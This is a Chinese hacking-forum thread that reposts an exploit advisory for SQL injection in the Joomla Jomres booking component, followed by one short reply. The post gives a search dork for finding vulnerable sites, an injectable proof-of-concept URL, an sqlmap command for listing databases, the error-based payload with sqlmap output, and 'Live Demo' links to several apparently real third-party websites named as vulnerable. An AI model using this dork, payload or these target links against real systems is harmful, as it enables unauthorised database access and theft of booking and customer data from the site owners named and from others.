查看: 11694|回复: 1

Joomla com_ jomres 注入漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-7-15 09:27:05 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    ######################
    # Exploit Title :  Joomla com_ jomres SQL injection Vulnerability
    # Exploit Author : xBADGIRL21
    # Dork : index.php?option=com_ jomres   "property_uid"
    # Software link : [url]https://www.jomres.net/files/jomres_joomla_component_installer.zip[/url]
    # Vendor Homepage : [url]https://www.jomres.net[/url]
    # Tested on: [ Kali Linux 2.0 ]
    # skype:xbadgirl21
    # Date: 2016/07/12
    # video Proof : [url]https://youtu.be/BjTHnDZsX_s[/url]
    ######################
    # [+] DESCRIPTION :
    ######################
    # [+] Jomres is the most powerful, commission-free Joomla and WordPress online booking system and property management solution 
    # [+] used by thousands of businesses worldwide 
    # [+] to better manage their properties, reservations, payments and increase sales
    # [+] and an SQL injection been Detected in this Joomla components jomres
    ######################
    # [+] Poc :
    ######################
    #   [property_uid] Get Parameter Vulnerable To SQLi
    #    http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'
    ######################
    # [+] SQLmap Poc :
    ######################
    # http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'&tmpl=kiss&lang=ro" -p property_uid --dbs
    # Parameter: property_uid (GET)
    # Type: error-based
    # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    # Payload: option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DiLY&tmpl=kiss&lang=ro
    # ---
    # [15:29:04] [INFO] the back-end DBMS is MySQL
    # web application technology: PHP 5.4.45, Apache
    # back-end DBMS: MySQL 5.0
    # [15:29:04] [INFO] fetching current database
    ######################
    # [+] Live Demo :
    ######################
    # [url]https://turo.ro/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103%27&property_uid=82%27&tmpl=kiss&lang=ro[/url]
    # [url]http://www.apartamentosviella.com/index.php?option=com_jomres&Itemid=160&lang=es&task=listProperties&propertylist_layout=mapview[/url]
    # [url]http://www.andorraski.be/index.php?option=com_jomres&Itemid=140&lang=nl&task=dobooking&selectedProperty=50[/url]
    ######################
    # Discovered by : xBADGIRL21
    # Greetz : All Mauritanien Hackers - NoWhere
    #######################
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-11-12 12:49
  • 签到天数: 222 天

    [LV.7]常住居民III

    发表于 2016-7-15 10:09:48 | 显示全部楼层
    火钳留名
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 05:11 , Processed in 0.024199 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部